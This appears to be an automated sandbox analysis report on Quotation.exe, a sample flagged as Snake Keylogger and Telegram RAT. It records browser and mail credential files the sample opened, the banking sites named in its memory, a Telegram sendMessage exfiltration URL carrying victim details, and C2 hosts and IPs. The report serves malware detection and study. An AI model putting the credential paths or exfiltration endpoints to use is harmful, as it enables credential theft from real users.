Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594613	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 593985	Jump to behavior

Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4104411701.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003A22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Quotation.exe, 00000000.00000002.4106555406.0000000003D41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\Quotation.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: Quotation.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: Quotation.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Quotation.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: Quotation.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: Quotation.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: Quotation.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Quotation.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1633838435.0000000000452000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 2168, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation.exe	71%	ReversingLabs	ByteCode-MSIL.Spyware.Snakekeylogger
Quotation.exe	71%	Virustotal		Browse
Quotation.exe	100%	Avira	HEUR/AGEN.1307591
Quotation.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
mail.electradubai.com	0%	Virustotal	Browse
reallyfreegeoip.org	0%	Virustotal	Browse
api.telegram.org	2%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://www.office.com/lB	0%	Virustotal		Browse
https://api.telegram.org	1%	Virustotal		Browse
https://api.telegram.org/bot	4%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=	2%	Virustotal		Browse
https://chrome.google.com/webstore?hl=en	0%	Virustotal		Browse
https://www.office.com/	0%	Virustotal		Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a	2%	Virustotal		Browse
http://mail.electradubai.com	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.electradubai.com	192.250.231.25	true	true	0%, Virustotal, Browse	unknown
reallyfreegeoip.org	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
checkip.dyndns.com	132.226.247.73	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2007/10/2024%20/%2015:28:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	Quotation.exe, 00000000.00000002.4104956397.0000000002B82000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/chrome_newtab	Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.telegram.org/bot	Quotation.exe	false	4%, Virustotal, Browse	unknown
https://www.office.com/lB	Quotation.exe, 00000000.00000002.4104956397.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	Quotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://chrome.google.com/webstore?hl=en	Quotation.exe, 00000000.00000002.4104956397.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002B42000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002B82000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.ecosia.org/newtab/	Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	Quotation.exe	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	Quotation.exe	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	Quotation.exe, 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
